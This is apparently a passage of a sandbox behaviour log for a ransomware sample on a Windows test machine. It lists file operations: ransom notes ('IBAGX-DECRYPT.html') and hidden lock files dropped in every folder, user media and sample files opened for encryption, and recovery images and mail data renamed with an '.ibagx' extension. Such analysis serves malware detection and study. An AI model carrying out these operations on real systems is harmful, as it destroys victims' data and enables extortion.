Fn
Create C:\Users\EEBsYm5\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\EEBsYm5\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Videos\0N8zSzm7.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\1bH7ALfO kEZ3N0YY.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\1mxHuH2E0pBjqicdI.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\2NvXPx3pbCihi-WvFnA-.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\31BvzJTrn.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\327WDGm.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\4Cqbx5Fnwbw.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\59Ao72gGQ9bLjP.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\5Bt0f83.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\6RpGLPeBYQc.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\7bIVX.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\7MkyA glAhP.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\8-bosCwG.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\8hxgdFxXCLL.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\9ySpKabfl.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\Bm_sAM64w6O.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\bUwQZK-Uk8g7DIOod8.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\CuitW9 F0Xa0.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\gb5-MioxOMQZZ4GpDV.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\IxE2AYbwS_oDO.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\lLhEDAlm.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\lSDxfkKZxJGVIm.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\nxNap_pv2-2Wtn.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\q-5yR9fRS23.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\s1nxHkoplGUBAybekj.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\tl08 cYp6iZl-Yix.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\VzI4RFS_weo9.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\xMCsdSdo1FEHrrY-_.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Videos\ZCLgRDi776KoY.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Libraries\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Libraries\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Music\Sample Music\Kalimba.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Music\Sample Music\Sleep Away.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Desert.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Koala.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Recorded TV\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Public\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\Public\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Public\Videos\Sample Videos\Wildlife.wmv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Local\Temp\\pidor.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Move \??\C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi.ibagx source_filename = C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi True 1
Fn
Move \??\C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim.ibagx source_filename = C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg True 1
Fn
Move \??\C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.ibagx source_filename = C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm True 1
Fn
